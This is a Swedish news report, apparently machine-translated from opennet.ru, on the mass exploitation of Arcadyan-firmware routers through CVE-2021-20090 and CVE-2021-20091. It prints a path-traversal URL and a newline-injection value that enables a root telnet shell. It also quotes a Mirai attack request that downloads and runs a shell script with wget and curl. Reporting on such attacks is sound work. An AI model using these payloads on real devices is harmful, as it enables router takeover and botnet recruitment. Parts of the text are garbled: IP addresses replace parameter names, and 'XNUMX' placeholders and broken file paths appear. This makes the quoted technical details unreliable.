En massiv attack har registrerats på nätverket mot hemroutrar vars firmware använder en HTTP-serverimplementering från företaget Arcadyan. För att få kontroll över enheter används en kombination av två sårbarheter som tillåter fjärrexekvering av godtycklig kod med roträttigheter. Problemet påverkar ett ganska brett utbud av ADSL-routrar från Arcadyan, ASUS och Buffalo, samt enheter som levereras under varumärkena Beeline (problemet bekräftas i Smart Box Flash), Deutsche Telekom, Orange, O2, Telus, Verizon, Vodafone och andra teleoperatörer. Det noteras att problemet har funnits i Arcadyan firmware i mer än 10 år och har under denna tid lyckats migrera till minst 20 enhetsmodeller från 17 olika tillverkare.
Den första sårbarheten, CVE-2021-20090, gör det möjligt att komma åt alla webbgränssnittsskript utan autentisering. Kärnan i sårbarheten är att i webbgränssnittet är vissa kataloger genom vilka bilder, CSS-filer och JavaScript-skript skickas tillgängliga utan autentisering. I det här fallet kontrolleras kataloger för vilka åtkomst utan autentisering är tillåten med den initiala masken. Att ange "../"-tecken i sökvägar för att gå till den överordnade katalogen blockeras av den fasta programvaran, men kombinationen "..%2f" hoppas över. Således är det möjligt att öppna skyddade sidor när du skickar förfrågningar som "http://192.168.1.1/images/..%2findex.htm".
Den andra sårbarheten, CVE-2021-20091, gör det möjligt för en autentiserad användare att göra ändringar i enhetens systeminställningar genom att skicka speciellt formaterade parametrar till skriptet application_abstract.cgi, som inte kontrollerar förekomsten av ett nyradstecken i parametrarna . Till exempel, när en angripare utför en ping-operation kan en angripare ange värdet "192.168.1.2%0AARC_SYS_TelnetdEnable=1" i fältet med IP-adressen som kontrolleras, och skriptet, när inställningsfilen /tmp/etc/config/ skapas .glbcfg, kommer att skriva raden "AARC_SYS_TelnetdEnable=1" i den ", vilket aktiverar telnetd-servern, som ger obegränsad åtkomst till kommandoskalet med roträttigheter. På samma sätt, genom att ställa in parametern AARC_SYS, kan du köra vilken kod som helst på systemet. Den första sårbarheten gör det möjligt att köra ett problematiskt skript utan autentisering genom att komma åt det som "/images/..%2fapply_abstract.cgi".
För att utnyttja sårbarheter måste en angripare kunna skicka en begäran till nätverksporten där webbgränssnittet körs. Att döma av dynamiken i spridningen av attacken lämnar många operatörer åtkomst på sina enheter från det externa nätverket för att förenkla diagnosen av problem av supporttjänsten. Om åtkomsten till gränssnittet endast är begränsad till det interna nätverket, kan en attack utföras från ett externt nätverk med hjälp av tekniken "DNS rebinding". Sårbarheter används redan aktivt för att ansluta routrar till Mirai botnät: POST /images/..%2fapply_abstract.cgi HTTP/1.1 Anslutning: stäng User-Agent: Dark action=start_ping&submit_button=ping.html& action_params=blink_time%3D5&ARC_212.192.241.7.ipaddress=0. 1%0A ARC_SYS_TelnetdEnable=212.192.241.72& %212.192.241.72AARC_SYS_=cd+/tmp; wget+http://777/lolol.sh; curl+-O+http://0/lolol.sh; chmod+4+lolol.sh; sh+lolol.sh&ARC_ping_status=XNUMX&TMP_Ping_Type=XNUMX
Källa: opennet.ru